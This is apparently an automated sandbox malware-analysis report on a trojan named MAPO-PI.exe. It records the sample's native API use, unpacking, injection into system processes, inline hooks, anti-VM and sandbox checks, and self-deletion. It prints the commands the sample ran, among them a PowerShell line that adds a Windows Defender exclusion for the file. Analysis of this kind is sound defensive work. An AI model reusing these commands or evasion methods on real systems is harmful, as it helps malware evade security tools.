Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C899BF 16_2_04C899BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C6F900 16_2_04C6F900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C84120 16_2_04C84120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D322AE 16_2_04D322AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D1FA2B 16_2_04D1FA2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D2DBD2 16_2_04D2DBD2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D203DA 16_2_04D203DA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C9EBB0 16_2_04C9EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04C8AB40 16_2_04C8AB40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04D32B28 16_2_04D32B28
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304E269 16_2_0304E269
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304DA87 16_2_0304DA87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CF96 16_2_0304CF96
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03032FB0 16_2_03032FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304DFFF 16_2_0304DFFF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03039E2B 16_2_03039E2B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03039E30 16_2_03039E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03032D90 16_2_03032D90
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304D475 16_2_0304D475
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 04C6B150 appears 66 times
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: String function: 0189B150 appears 133 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419D50 NtCreateFile, 3_2_00419D50
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419E00 NtReadFile, 3_2_00419E00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419E80 NtClose, 3_2_00419E80
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419F30 NtAllocateVirtualMemory, 3_2_00419F30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419D4A NtCreateFile, 3_2_00419D4A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419DFB NtReadFile, 3_2_00419DFB
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419DA2 NtCreateFile, 3_2_00419DA2
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419E7A NtClose, 3_2_00419E7A
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00419F2D NtAllocateVirtualMemory, 3_2_00419F2D
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D99A0 NtCreateSection,LdrInitializeThunk, 3_2_018D99A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_018D9910
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D98F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_018D98F0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9840 NtDelayExecution,LdrInitializeThunk, 3_2_018D9840
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_018D9860
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_018D9A00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A20 NtResumeThread,LdrInitializeThunk, 3_2_018D9A20
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A50 NtCreateFile,LdrInitializeThunk, 3_2_018D9A50
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D95D0 NtClose,LdrInitializeThunk, 3_2_018D95D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9540 NtReadFile,LdrInitializeThunk, 3_2_018D9540
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9780 NtMapViewOfSection,LdrInitializeThunk, 3_2_018D9780
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D97A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_018D97A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9710 NtQueryInformationToken,LdrInitializeThunk, 3_2_018D9710
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D96E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_018D96E0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_018D9660
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D99D0 NtCreateProcessEx, 3_2_018D99D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9950 NtQueueApcThread, 3_2_018D9950
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D98A0 NtWriteVirtualMemory, 3_2_018D98A0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9820 NtEnumerateKey, 3_2_018D9820
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DB040 NtSuspendThread, 3_2_018DB040
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DA3B0 NtGetContextThread, 3_2_018DA3B0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9B00 NtSetValueKey, 3_2_018D9B00
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A80 NtOpenDirectoryObject, 3_2_018D9A80
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9A10 NtQuerySection, 3_2_018D9A10
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D95F0 NtQueryInformationFile, 3_2_018D95F0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9520 NtWaitForSingleObject, 3_2_018D9520
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DAD30 NtSetContextThread, 3_2_018DAD30
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9560 NtWriteFile, 3_2_018D9560
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9FE0 NtCreateMutant, 3_2_018D9FE0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DA710 NtOpenProcessToken, 3_2_018DA710
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9730 NtQueryVirtualMemory, 3_2_018D9730
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9760 NtOpenProcess, 3_2_018D9760
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018DA770 NtOpenThread, 3_2_018DA770
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9770 NtSetInformationFile, 3_2_018D9770
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D96D0 NtCreateKey, 3_2_018D96D0
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9610 NtEnumerateValueKey, 3_2_018D9610
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9650 NtQueryValueKey, 3_2_018D9650
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018D9670 NtQueryInformationProcess, 3_2_018D9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA95D0 NtClose,LdrInitializeThunk, 16_2_04CA95D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9540 NtReadFile,LdrInitializeThunk, 16_2_04CA9540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA96D0 NtCreateKey,LdrInitializeThunk, 16_2_04CA96D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA96E0 NtFreeVirtualMemory,LdrInitializeThunk, 16_2_04CA96E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9650 NtQueryValueKey,LdrInitializeThunk, 16_2_04CA9650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9660 NtAllocateVirtualMemory,LdrInitializeThunk, 16_2_04CA9660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9FE0 NtCreateMutant,LdrInitializeThunk, 16_2_04CA9FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9780 NtMapViewOfSection,LdrInitializeThunk, 16_2_04CA9780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9710 NtQueryInformationToken,LdrInitializeThunk, 16_2_04CA9710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9840 NtDelayExecution,LdrInitializeThunk, 16_2_04CA9840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9860 NtQuerySystemInformation,LdrInitializeThunk, 16_2_04CA9860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA99A0 NtCreateSection,LdrInitializeThunk, 16_2_04CA99A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 16_2_04CA9910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A50 NtCreateFile,LdrInitializeThunk, 16_2_04CA9A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA95F0 NtQueryInformationFile, 16_2_04CA95F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9560 NtWriteFile, 16_2_04CA9560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9520 NtWaitForSingleObject, 16_2_04CA9520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAAD30 NtSetContextThread, 16_2_04CAAD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9670 NtQueryInformationProcess, 16_2_04CA9670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9610 NtEnumerateValueKey, 16_2_04CA9610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA97A0 NtUnmapViewOfSection, 16_2_04CA97A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9760 NtOpenProcess, 16_2_04CA9760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAA770 NtOpenThread, 16_2_04CAA770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9770 NtSetInformationFile, 16_2_04CA9770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAA710 NtOpenProcessToken, 16_2_04CAA710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9730 NtQueryVirtualMemory, 16_2_04CA9730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA98F0 NtReadVirtualMemory, 16_2_04CA98F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA98A0 NtWriteVirtualMemory, 16_2_04CA98A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAB040 NtSuspendThread, 16_2_04CAB040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9820 NtEnumerateKey, 16_2_04CA9820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA99D0 NtCreateProcessEx, 16_2_04CA99D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9950 NtQueueApcThread, 16_2_04CA9950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A80 NtOpenDirectoryObject, 16_2_04CA9A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A00 NtProtectVirtualMemory, 16_2_04CA9A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A10 NtQuerySection, 16_2_04CA9A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9A20 NtResumeThread, 16_2_04CA9A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CAA3B0 NtGetContextThread, 16_2_04CAA3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CA9B00 NtSetValueKey, 16_2_04CA9B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049F30 NtAllocateVirtualMemory, 16_2_03049F30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049E00 NtReadFile, 16_2_03049E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049E80 NtClose, 16_2_03049E80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049D50 NtCreateFile, 16_2_03049D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049F2D NtAllocateVirtualMemory, 16_2_03049F2D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049E7A NtClose, 16_2_03049E7A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049D4A NtCreateFile, 16_2_03049D4A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049DA2 NtCreateFile, 16_2_03049DA2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03049DFB NtReadFile, 16_2_03049DFB
Sample file is different than original file name gathered from version info
Source: MAPO-PI.exe Binary or memory string: OriginalFilename vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameTaskNode.dll4 vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000000.00000002.237496370.000000000008A000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000000.232786703.0000000000ECA000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000002.293450051.0000000001859000.00000040.00020000.sdmp Binary or memory string: OriginalFilenameCMMON32.exe` vs MAPO-PI.exe
Source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs MAPO-PI.exe
Source: MAPO-PI.exe Binary or memory string: OriginalFilenameDebugVi.exe< vs MAPO-PI.exe
PE file contains strange resources
Source: MAPO-PI.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MAPO-PI.exe Virustotal: Detection: 30%
Source: MAPO-PI.exe ReversingLabs: Detection: 39%
Source: MAPO-PI.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\MAPO-PI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\MAPO-PI.exe 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MAPO-PI.exe Process created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MAPO-PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\MAPO-PI.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/5@3/3
Source: C:\Users\user\Desktop\MAPO-PI.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\MAPO-PI.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: MAPO-PI.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\MAPO-PI.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: MAPO-PI.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: MAPO-PI.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cmmon32.pdb source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: MAPO-PI.exe, 00000003.00000002.293436175.0000000001850000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: MAPO-PI.exe, 00000003.00000002.293616666.000000000198F000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MAPO-PI.exe, cmmon32.exe

Data Obfuscation:

.NET source code contains potential unpacker
Source: MAPO-PI.exe, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.MAPO-PI.exe.70000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.3.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.0.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.9.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.2.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.1.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.7.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.MAPO-PI.exe.eb0000.5.unpack, Platformer_AI/GameDisplay.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_004170AC push eax; retf 3_2_004170AF
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00417A47 push edx; ret 3_2_00417A48
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0040ED75 push 00000051h; retf 3_2_0040ED79
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CEF2 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CEFB push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CEA5 push eax; ret 3_2_0041CEF8
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_0041CF5C push eax; ret 3_2_0041CF62
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_018ED0D1 push ecx; ret 3_2_018ED0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_04CBD0D1 push ecx; ret 16_2_04CBD0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_03047A47 push edx; ret 16_2_03047A48
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_030470AC push eax; retf 16_2_030470AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CF5C push eax; ret 16_2_0304CF62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CEA5 push eax; ret 16_2_0304CEF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CEF2 push eax; ret 16_2_0304CEF8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0304CEFB push eax; ret 16_2_0304CF62
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 16_2_0303ED75 push 00000051h; retf 16_2_0303ED79

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEA
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: /c del 'C:\Users\user\Desktop\MAPO-PI.exe'
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\MAPO-PI.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\MAPO-PI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.MAPO-PI.exe.25fd0c0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MAPO-PI.exe PID: 3868, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\MAPO-PI.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 00000000030398E4 second address: 00000000030398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe RDTSC instruction interceptor: First address: 0000000003039B4E second address: 0000000003039B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 1752 Thread sleep time: -43348s >= -30000s
Source: C:\Users\user\Desktop\MAPO-PI.exe TID: 2952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1552 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 4856 Thread sleep time: -54000s >= -30000s
Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6932 Thread sleep time: -65000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\MAPO-PI.exe Code function: 3_2_00409A80 rdtsc 3_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5905
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2572
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 43348
Source: C:\Users\user\Desktop\MAPO-PI.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.278762456.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.273464193.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000004.00000000.272236107.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000004.00000000.266810191.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
